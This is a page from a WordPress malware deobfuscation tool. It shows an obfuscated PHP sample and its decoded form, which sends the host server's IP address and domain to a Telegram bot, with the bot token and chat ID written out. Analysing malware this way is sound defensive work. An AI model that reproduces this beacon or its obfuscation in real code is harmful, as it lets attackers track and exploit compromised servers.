Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php goto vUzBk; vUzBk: $server_ip = $_SERVER["\x53\x45\x52\126\x45\122\x5f\x41\104\x44\122"]; goto VhZv8; R9IMN: $result = curl_exec($ch); goto m3JRs; A2Lo2: $telegram_api_url = "\150\164\x74\x70\x73\x3a\57\57\141\x70\x69\56\x74\x65\154\145\147\x72\x61\x6d\x2e\x6f\x72\x67\x2f\142\x6f\x74" . $te...



Obfuscated php code

<?php
 goto vUzBk; vUzBk: $server_ip = $_SERVER["\x53\x45\x52\126\x45\122\x5f\x41\104\x44\122"]; goto VhZv8; R9IMN: $result = curl_exec($ch); goto m3JRs; A2Lo2: $telegram_api_url = "\150\164\x74\x70\x73\x3a\57\57\141\x70\x69\56\x74\x65\154\145\147\x72\x61\x6d\x2e\x6f\x72\x67\x2f\142\x6f\x74" . $telegram_bot_token . "\57\163\x65\x6e\x64\x4d\145\x73\163\x61\x67\x65"; goto z0a3L; P1Y61: $telegram_chat_id = "\x36\61\x32\67\70\64\x31\x34\61\x32"; goto A2Lo2; kJejC: $message = "\123\145\162\166\145\162\40\111\120\72\x20" . $server_ip . "\12"; goto UzP1J; TTz4s: curl_setopt($ch, CURLOPT_HEADER, false); goto R9IMN; NyfZ9: curl_setopt($ch, CURLOPT_POST, 1); goto Kmn79; hUdkJ: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto TTz4s; m3JRs: curl_close($ch); goto KtzM8; z0a3L: $ch = curl_init($telegram_api_url); goto NyfZ9; ajjxq: $telegram_bot_token = "\65\x38\x37\x35\61\x38\x34\65\x36\x31\x3a\x41\101\107\x48\125\147\137\165\x74\x52\x6a\65\x51\117\x79\x73\x55\x52\137\x31\142\x42\164\x6d\x49\112\64\171\102\164\x4b\163\106\x71\x30"; goto P1Y61; Kmn79: curl_setopt($ch, CURLOPT_POSTFIELDS, "\143\x68\x61\164\137\x69\144\x3d" . $telegram_chat_id . "\x26\x74\x65\x78\x74\75" . urlencode($message)); goto hUdkJ; VhZv8: $server_domain = $_SERVER["\110\124\124\120\x5f\x48\117\123\124"]; goto kJejC; UzP1J: $message .= "\104\157\x6d\141\151\156\x3a\x20" . $server_domain; goto ajjxq; KtzM8: 
 ?>

Decoded(de-Obfuscated) php code

<?php

$server_ip = $_SERVER["SERVER_ADDR"];
$server_domain = $_SERVER["HTTP_HOST"];
$message = "Server IP: " . $server_ip . "\n";
$message .= "Domain: " . $server_domain;
$telegram_bot_token = "5875184561:AAGHUg_utRj5QOysUR_1bBtmIJ4yBtKsFq0";
$telegram_chat_id = "6127841412";
$telegram_api_url = "https://api.telegram.org/bot5875184561:AAGHUg_utRj5QOysUR_1bBtmIJ4yBtKsFq0/sendMessage";
$ch = curl_init($telegram_api_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "chat_id=6127841412&text=" . urlencode($message));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
$result = curl_exec($ch);
curl_close($ch);

Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.